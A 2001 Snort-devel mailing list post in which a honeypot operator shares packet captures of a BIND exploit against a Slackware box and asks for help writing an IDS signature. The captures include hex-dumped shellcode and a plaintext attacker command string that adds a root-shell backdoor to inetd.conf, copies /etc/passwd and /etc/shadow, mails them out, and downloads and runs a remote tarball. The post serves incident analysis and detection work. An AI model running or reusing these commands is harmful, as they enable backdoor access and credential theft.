[Snort-devel] Bind exploit -- any ideas on creating a signature?

shawn . moyer shawn at ...232...
Tue Feb 27 22:28:53 EST 2001


My honeypot was recently compromised via a Bind exploit, and as far as I
can tell Snort doesn't have a signature for it. I did get one alert:

[**] IDS277 - NAMED Iquery Probe [**]
02/27-17:15:22.126692 0:3:6C:6:FC:8C -> 0:20:78:15:5E:80 type:0x800
len:0x41
210.233.X.X:2534 -> X.X.X.X:53 UDP TTL:40 TOS:0x0 ID:40154 IpLen:20
DgmLen:51
Len: 31

Unfortunately this alert doesn't necessarily state that an actual
exploit took place. My guess is that the named-iquery was followed with
an actual attack. 

I'm using Snort to log all traffic to and from the honeynet ( alert tcp
any any <> $HONEYPOT any, alert udp any any <> $HONEYPOT any), so I'm
including all of the relevant captures from the IP address above -- I
know the box was compromised b/c named died, inetd was restarted and
"1008 stream tcp nowait root /bin/sh sh" was added to inetd.conf. The
funny thing is that I went ahead and restarted named, disabled the
backdoor in inetd and the box was compromised almost exactly 24 hours
later by the same IP. 

The funny thing is that b/c the box is behind bimapped NAT, and the
script mails the output of 'ifconfig -a' to the the SK's email addy., I
don't think he can find the box to get to it. :)

If this doesn't appear to be enough info, let me know and I'll see if I
can get another capture. Also, I've been running Snort with '-C', so I'm
afraid I don't have a hex dump yet.






Relevant info:

Linux mail 2.2.13 #127 Thu Oct 21 13:13:20 CDT 1999 i586 unknown

mail:/tmp/.../log# named -v
named 8.2.2-REL Sat Oct 23 20:10:05 CDT 1999
root at ...291...:/tmp/bind-8.2.2/src/bin/named

The box is running a default install of Slackware 7.0.





Here are the captures:

[**] UDP traffic logged [**]
02/27-17:15:22.126944 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x41
210.233.X.X:2534 -> 172.16.0.2:53 UDP TTL:39 TOS:0x0 ID:40154 IpLen:20
DgmLen:51
Len: 31
.................    .a^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] UDP traffic logged [**]
02/27-17:15:22.128052 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x2A2
172.16.0.2:53 -> 210.233.X.X:2534 UDP TTL:64 TOS:0x0 ID:33882 IpLen:20
DgmLen:660
Len: 640
.................    .a.`R..x...........h...........t...........
........t.. at ...292...@... at ...293...@.%. at ...294...@.;. at ...295...@........
... at ...292...=.. at ...296...@T...t.. at ...296...@........h...................... at ...292...
.............R...S...T.......R..........U...P................R..
.p. at ...297...@.........`. at ...298...
.....d..|.......$........6.......R.......B. at ...299...:$....6..........
.........i......$...`R..x........... S.. T.. U...R...S...T...S..
.R................. at ...300...>.:0.K+.4.:0.Q4U....'.3U....'.3.4.:...3....
^8........{.p.W.........1k...R..lB. at ...301...
....lB.@$...`R..x...(...(...S....R..X.. at ...296...@... at ...302...@^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] UDP traffic logged [**]
02/27-17:15:22.323078 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x227
210.233.X.X:2534 -> 172.16.0.2:53 UDP TTL:39 TOS:0x0 ID:40326 IpLen:20
DgmLen:537
Len: 517
............?....;1._..|.w..w..O .O.....1.....Q1..f......Y1.9.u.
f...f9^.t...?.......1...1..?I..A....1.[.K....C..C.1........../bi
n/sh........... at ...41...@... at ...303...@....
.............R...S...T.......R...............................R..
.p. at ...304...
........|.......$........................B. at ...305...
.........i...........R...............S...T...U...R...S...T...S..
.R................. at ...300...>.:...+.4.:...4.....'.3.....'.3.........^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] UDP traffic logged [**]
02/27-17:15:22.324382 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x23F
172.16.0.2:53 -> 210.233.X.X:2534 UDP TTL:64 TOS:0x0 ID:33883 IpLen:20
DgmLen:561
Len: 541
............?....;1._..|.w..w..O .O.....1.....Q1..f......Y1.9.u.
f...f9^.t...?.......1...1..?I..A....1.[.K....C..C.1........../bi
n/sh........... at ...41...@... at ...303...@....
.............R...S...T.......R...............................R..
.p. at ...304...
........|.......$........................B. at ...305...
.........i...........R...............S...T...U...R...S...T...S..
.R................. at ...300...>.:...+.4.:...4.....'.3.....'.3............
.......:.4..,........^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:20.455846 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x4A
210.233.X.X:2447 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:38922 IpLen:20
DgmLen:60 DF
******S* Seq: 0x61833704  Ack: 0x0  Win: 0x7D78  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 16492729 0 NOP WS: 0 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:20.456596 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x4A
172.16.0.2:53 -> 210.233.X.X:2447 TCP TTL:64 TOS:0x0 ID:33878 IpLen:20
DgmLen:60 DF
***A**S* Seq: 0x975D6EAB  Ack: 0x61833705  Win: 0x3EBC  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 169830100 16492729 NOP 
TCP Options => WS: 0 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:20.664614 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x42
210.233.X.X:2447 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:39073 IpLen:20
DgmLen:52 DF
***A**** Seq: 0x61833705  Ack: 0x975D6EAC  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16492748 169830100 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:20.826386 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x42
210.233.X.X:2447 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:39231 IpLen:20
DgmLen:52 DF
***A***F Seq: 0x61833705  Ack: 0x975D6EAC  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16492766 169830100 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:20.826657 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x42
172.16.0.2:53 -> 210.233.X.X:2447 TCP TTL:64 TOS:0x0 ID:33879 IpLen:20
DgmLen:52 DF
***A**** Seq: 0x975D6EAC  Ack: 0x61833706  Win: 0x3EBC  TcpLen: 32
TCP Options (3) => NOP NOP TS: 169830137 16492766 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:20.826853 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x42
172.16.0.2:53 -> 210.233.X.X:2447 TCP TTL:64 TOS:0x0 ID:33880 IpLen:20
DgmLen:52 DF
***A***F Seq: 0x975D6EAC  Ack: 0x61833706  Win: 0x3EBC  TcpLen: 32
TCP Options (3) => NOP NOP TS: 169830137 16492766 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:21.023833 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x42
210.233.X.X:2447 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:39341 IpLen:20
DgmLen:52 DF
***A**** Seq: 0x61833706  Ack: 0x975D6EAD  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16492786 169830137 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:21.934749 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x4A
210.233.X.X:2552 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:40029 IpLen:20
DgmLen:60 DF
******S* Seq: 0x619DA465  Ack: 0x0  Win: 0x7D78  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 16492877 0 NOP WS: 0 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:21.935017 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x4A
172.16.0.2:53 -> 210.233.X.X:2552 TCP TTL:64 TOS:0x0 ID:33881 IpLen:20
DgmLen:60 DF
***A**S* Seq: 0x9681C8E4  Ack: 0x619DA466  Win: 0x3EBC  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 169830247 16492877 NOP 
TCP Options => WS: 0 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:22.118196 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x42
210.233.X.X:2552 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:40149 IpLen:20
DgmLen:52 DF
***A**** Seq: 0x619DA466  Ack: 0x9681C8E5  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16492895 169830247 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:23.324321 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x42
210.233.X.X:2552 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:41023 IpLen:20
DgmLen:52 DF
***A***F Seq: 0x619DA65A  Ack: 0x9681C8E5  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16493016 169830247 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:23.324645 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x4E
172.16.0.2:53 -> 210.233.X.X:2552 TCP TTL:64 TOS:0x0 ID:33884 IpLen:20
DgmLen:64 DF
***A**** Seq: 0x9681C8E5  Ack: 0x619DA466  Win: 0x3EBC  TcpLen: 44
TCP Options (6) => NOP NOP TS: 169830386 16492895 NOP NOP Sack:
24989 at ...306... 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:23.327329 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x236
210.233.X.X:2552 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:41022 IpLen:20
DgmLen:552 DF
***AP*** Seq: 0x619DA466  Ack: 0x9681C8E5  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16493016 169830247 
PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PAT
H;export TERM=vt100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.li
b;echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.con
f;killall -HUP inetd;ifconfig -a>1i0n;cat /etc/passwd >>1i0n;cat
 /etc/shadow >>1i0n;mail 1i0nip at ...307... <1i0n;rm -fr 1i0n;rm -
fr /.bash_history;lynx -dump http://coollion.51.net/crew.tgz >1i
0n.tgz;tar -zxvf 1i0n.tgz;rm -fr 1i0n.tgz;cd lib;./1i0n.sh;exit;
..error.............................T...............^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:23.327968 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x42
172.16.0.2:53 -> 210.233.X.X:2552 TCP TTL:64 TOS:0x0 ID:33885 IpLen:20
DgmLen:52 DF
***A**** Seq: 0x9681C8E5  Ack: 0x619DA65B  Win: 0x3CC7  TcpLen: 32
TCP Options (3) => NOP NOP TS: 169830387 16493016 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:35.764194 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x63
172.16.0.2:53 -> 210.233.X.X:2552 TCP TTL:64 TOS:0x0 ID:33912 IpLen:20
DgmLen:85 DF
***AP*** Seq: 0x9681C8E5  Ack: 0x619DA65B  Win: 0x3CC7  TcpLen: 32
TCP Options (3) => NOP NOP TS: 169831630 16493016 
.gzip: stdin: not in gzip format.^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:35.776978 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x42
172.16.0.2:53 -> 210.233.X.X:2552 TCP TTL:64 TOS:0x0 ID:33913 IpLen:20
DgmLen:52 DF
***A*R** Seq: 0x9681C9AA  Ack: 0x619DA65B  Win: 0x3EBC  TcpLen: 32
TCP Options (3) => NOP NOP TS: 169831632 16493016 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:35.947510 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x36
210.233.X.X:2552 -> 172.16.0.2:53 TCP TTL:230 TOS:0x0 ID:50144 IpLen:20
DgmLen:40
*****R** Seq: 0x619DA65B  Ack: 0x0  Win: 0x0  TcpLen: 20
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+






If you've read this far, thanks for your help!



--shawn

-- 
s h a w n   m o y e r
shawn at ...232...

Man will occasionally stumble over the truth,
but most of the time he will pick himself up and continue on.

					-- Churchill




More information about the Snort-devel mailing list